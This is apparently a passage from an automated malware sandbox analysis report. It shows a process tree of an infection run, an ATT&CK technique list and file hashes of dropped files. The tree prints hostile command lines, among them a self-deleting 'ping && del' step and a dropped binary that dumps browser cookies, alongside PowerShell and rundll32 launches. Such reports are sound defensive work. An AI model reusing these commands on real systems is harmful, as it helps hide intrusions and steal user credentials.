                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                            8⤵
                                                                                                                              PID:5060
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                              8⤵
                                                                                                                                PID:5856
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NCZgYfKnLJ\NCZgYfKnLJ.dll" NCZgYfKnLJ
                                                                                                                                8⤵
                                                                                                                                  PID:2824
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NCZgYfKnLJ\NCZgYfKnLJ.dll" NCZgYfKnLJ
                                                                                                                                    9⤵
                                                                                                                                      PID:5796
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                                    8⤵
                                                                                                                                      PID:5124
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                                      8⤵
                                                                                                                                        PID:6064
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                                        8⤵
                                                                                                                                          PID:6028
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            9⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5352
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                                          8⤵
                                                                                                                                            PID:5608
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                                            8⤵
                                                                                                                                              PID:5148
                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                              8⤵
                                                                                                                                                PID:5160
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:4596
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                                                      3⤵
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:4960
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 127.0.0.1
                                                                                                                                        4⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:4712
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    PID:3160
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:3472
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5388
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1588
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      3⤵
                                                                                                                                        PID:2780
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        3⤵
                                                                                                                                          PID:5436
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:816
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:636
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:4164
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:4920
                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:5020
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:5108
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:4452
                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                            1⤵
                                                                                                                                            • Enumerates connected drives
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:4320
                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding CE1380675F3449EF7AD244BB39EDDABE C
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:4964
                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 8EC4F038C21F634ED199F9ABA4BEEA93
                                                                                                                                              2⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:4292
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                3⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:5136
                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding E4821FBBDB889B124BCF008DF61BA361 E Global\MSI0000
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:5680
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:2176
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:5360
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D15A.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D15A.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5684
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                            1⤵
                                                                                                                                              PID:2104
                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                              1⤵
                                                                                                                                                PID:4140
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:5600
                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4236
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5780
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3852
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4932

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                        Execution

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Persistence

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1060

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        BITS Jobs

                                                                                                                                                        1
                                                                                                                                                        T1197

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Modify Registry

                                                                                                                                                        3
                                                                                                                                                        T1112

                                                                                                                                                        BITS Jobs

                                                                                                                                                        1
                                                                                                                                                        T1197

                                                                                                                                                        Install Root Certificate

                                                                                                                                                        1
                                                                                                                                                        T1130

                                                                                                                                                        Credential Access

                                                                                                                                                        Credentials in Files

                                                                                                                                                        3
                                                                                                                                                        T1081

                                                                                                                                                        Discovery

                                                                                                                                                        Software Discovery

                                                                                                                                                        1
                                                                                                                                                        T1518

                                                                                                                                                        Query Registry

                                                                                                                                                        5
                                                                                                                                                        T1012

                                                                                                                                                        System Information Discovery

                                                                                                                                                        6
                                                                                                                                                        T1082

                                                                                                                                                        Security Software Discovery

                                                                                                                                                        1
                                                                                                                                                        T1063

                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                        2
                                                                                                                                                        T1120

                                                                                                                                                        Remote System Discovery

                                                                                                                                                        1
                                                                                                                                                        T1018

                                                                                                                                                        Collection

                                                                                                                                                        Data from Local System

                                                                                                                                                        3
                                                                                                                                                        T1005

                                                                                                                                                        Command and Control

                                                                                                                                                        Web Service

                                                                                                                                                        1
                                                                                                                                                        T1102

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Program Files\install.dat
                                                                                                                                                          MD5

                                                                                                                                                          806c3221a013fec9530762750556c332

                                                                                                                                                          SHA1

                                                                                                                                                          36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                          SHA256

                                                                                                                                                          9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                          SHA512

                                                                                                                                                          56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                        • C:\Program Files\install.dll
                                                                                                                                                          MD5

                                                                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                          SHA1

                                                                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                          SHA256

                                                                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                          SHA512

                                                                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                          MD5

                                                                                                                                                          fa08f6463ef7be976f91339d5c800cd3

                                                                                                                                                          SHA1

                                                                                                                                                          8f179db874997b62c87d6da487a4b3a4db332a50

                                                                                                                                                          SHA256

                                                                                                                                                          c9b2bbc388046f9e34ce5b00e7624956916650f0b4cc4db3ce9f3ee2fb024af3

                                                                                                                                                          SHA512

                                                                                                                                                          80424f97f0a2b9244a378c0713de0143e7c9165a6545d706c162b6b0554b4c7d012f1f99668b6d1edf098a7190b456307e7ff88241c61c5dbad39b58369faaf3

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                          MD5

                                                                                                                                                          21b384ab8f79242a8b66c0d2bcf28d14

                                                                                                                                                          SHA1

                                                                                                                                                          2c0a75ba21188dfbb1e5d26361bb7f4ccb5f1c3a

                                                                                                                                                          SHA256

                                                                                                                                                          7b4888ca877ce314415b04b92dffe7acf5f656b99908c9c0e174722b2e2386a4

                                                                                                                                                          SHA512

                                                                                                                                                          a3210cbde79ef024a5b17526b51f22c2ae86b03322e8cc06d8c8ad9c74d5ba7aeef792498198f21d43785b784f463126f686fe14396aef5ccecab63f61530e7e

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                          MD5

                                                                                                                                                          fb2add31f9bcb09df7a429fbf21a1fa1

                                                                                                                                                          SHA1

                                                                                                                                                          a9080821e94083948a8dd03e73646aa48e6b5071

                                                                                                                                                          SHA256

                                                                                                                                                          62e8d2ea6c075f38961a7b01aa7d8451ed06a0c393c428f57aa944ed237c6bfa

                                                                                                                                                          SHA512

                                                                                                                                                          5618b3f1f71ea13c600c75bd9e264cdcc4561e1cd3802910859d042d3a788fa2580535b06fc0bf00f320424f3dc598bdaffb025444867f2e79da019f2c958a8e

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                                          MD5

                                                                                                                                                          490d6405d343f24e60deadf00800c0fb

                                                                                                                                                          SHA1

                                                                                                                                                          6ef99eb0f3a0f034bccdb4a63861426cc087e4de

                                                                                                                                                          SHA256

                                                                                                                                                          0cd95bffac63f268708eb2824f2b3258ae83e1a65f45ed577dad631120929e7f

                                                                                                                                                          SHA512

                                                                                                                                                          d720ee66cfcf2a02811f0276491e69a695dcb95d5714a647f88b02465f4d08dbe0bc0e41f18641f33a7db2c52457a86aabba08aacc9ff7a7f81036d3e43d18f9

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                          MD5

                                                                                                                                                          28ec140087ac57b59cc8551c6e3ea2e3

                                                                                                                                                          SHA1

                                                                                                                                                          6e157dc50c7f7adbd74f30aa66d6e12dafabaa37

                                                                                                                                                          SHA256

                                                                                                                                                          c84914fc2fb4ef6e49afa58228abfc6791df683b95c13a500a502d19cec14bc8

                                                                                                                                                          SHA512

                                                                                                                                                          9f2521b6ba681ce52af7adf95adef8baa40025e91b43a9f25386f5f98d225aeec1590b6d36a3508e976b3bc448eaeadca7d99c0a7b135a585c54458b6ea54692

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\07-0d50b-1c2-9f795-a7d1f16f908e9\Turybasepa.exe
                                                                                                                                                          MD5

                                                                                                                                                          c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                                                          SHA1

                                                                                                                                                          c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                                                          SHA256

                                                                                                                                                          f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                                                          SHA512

                                                                                                                                                          32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\07-0d50b-1c2-9f795-a7d1f16f908e9\Turybasepa.exe
                                                                                                                                                          MD5

                                                                                                                                                          c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                                                          SHA1

                                                                                                                                                          c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                                                          SHA256

                                                                                                                                                          f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                                                          SHA512

                                                                                                                                                          32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\07-0d50b-1c2-9f795-a7d1f16f908e9\Turybasepa.exe.config
                                                                                                                                                          MD5

                                                                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                                          SHA1

                                                                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                                          SHA256

                                                                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                                          SHA512

                                                                                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4hzmo1xg.yla\KiffMainE1.exe
                                                                                                                                                          MD5

                                                                                                                                                          9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                                                          SHA1

                                                                                                                                                          9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                                                          SHA256

                                                                                                                                                          bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                                                          SHA512

                                                                                                                                                          0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4hzmo1xg.yla\KiffMainE1.exe
                                                                                                                                                          MD5

                                                                                                                                                          9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                                                          SHA1

                                                                                                                                                          9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                                                          SHA256

                                                                                                                                                          bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                                                          SHA512

                                                                                                                                                          0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5cywgify.rdx\huesaa.exe
                                                                                                                                                          MD5

                                                                                                                                                          646428f3a2c7fe50913dcd8458d53ae4

                                                                                                                                                          SHA1

                                                                                                                                                          a129d6ba974213d0a90273161f1baabdfb871521

                                                                                                                                                          SHA256

                                                                                                                                                          e27fe72920360973cd116caadff51ef457a090c5ca680c860999a8b195c669e3

                                                                                                                                                          SHA512

                                                                                                                                                          6864d8092991fcfb2b67a5b43fd9a1cb85f68df084f32357f61876992adde7745ecac619173067a2474650905c9fe86ccc4c7097568c5d7f2f46d1de8cfbdb15

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5cywgify.rdx\huesaa.exe
                                                                                                                                                          MD5

                                                                                                                                                          646428f3a2c7fe50913dcd8458d53ae4

                                                                                                                                                          SHA1

                                                                                                                                                          a129d6ba974213d0a90273161f1baabdfb871521

                                                                                                                                                          SHA256

                                                                                                                                                          e27fe72920360973cd116caadff51ef457a090c5ca680c860999a8b195c669e3

                                                                                                                                                          SHA512

                                                                                                                                                          6864d8092991fcfb2b67a5b43fd9a1cb85f68df084f32357f61876992adde7745ecac619173067a2474650905c9fe86ccc4c7097568c5d7f2f46d1de8cfbdb15

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5nmfgy2x.vgz\setup.exe
                                                                                                                                                          MD5

                                                                                                                                                          a2e98e2a9a2a80081d0083e4e24d2705

                                                                                                                                                          SHA1

                                                                                                                                                          61687bd2981ee41adb5ced7d9d6107f2a48ee106

                                                                                                                                                          SHA256

                                                                                                                                                          f687010b99d80f074185a53bd3e0940576298567055ca1b93603f5993dc0e552

                                                                                                                                                          SHA512

                                                                                                                                                          241609006986a19ee3365aea2733aa92c1ae519accecf655e2f98544288ea85f2c6bb4f24af781dea67cd10efe8c45f8be157851fcc90445d6fde1e1a77bca6c

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5nmfgy2x.vgz\setup.exe
                                                                                                                                                          MD5

                                                                                                                                                          a2e98e2a9a2a80081d0083e4e24d2705

                                                                                                                                                          SHA1

                                                                                                                                                          61687bd2981ee41adb5ced7d9d6107f2a48ee106

                                                                                                                                                          SHA256

                                                                                                                                                          f687010b99d80f074185a53bd3e0940576298567055ca1b93603f5993dc0e552

                                                                                                                                                          SHA512

                                                                                                                                                          241609006986a19ee3365aea2733aa92c1ae519accecf655e2f98544288ea85f2c6bb4f24af781dea67cd10efe8c45f8be157851fcc90445d6fde1e1a77bca6c

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MSI9E2C.tmp
                                                                                                                                                          MD5

                                                                                                                                                          d07ddd437009ebb9c21882579bf2df0d

                                                                                                                                                          SHA1

                                                                                                                                                          a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                                                          SHA256

                                                                                                                                                          c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                                                          SHA512

                                                                                                                                                          8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MSIA476.tmp
                                                                                                                                                          MD5

                                                                                                                                                          5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                                                          SHA1

                                                                                                                                                          3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                                                          SHA256

                                                                                                                                                          0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                                                          SHA512

                                                                                                                                                          2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                                          MD5

                                                                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                                          SHA1

                                                                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                                          SHA256

                                                                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                                          SHA512

                                                                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                                          MD5

                                                                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                                                          SHA1

                                                                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                                                          SHA256

                                                                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                                                          SHA512

                                                                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                                          MD5

                                                                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                                                          SHA1

                                                                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                                                          SHA256

                                                                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                                                          SHA512

                                                                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

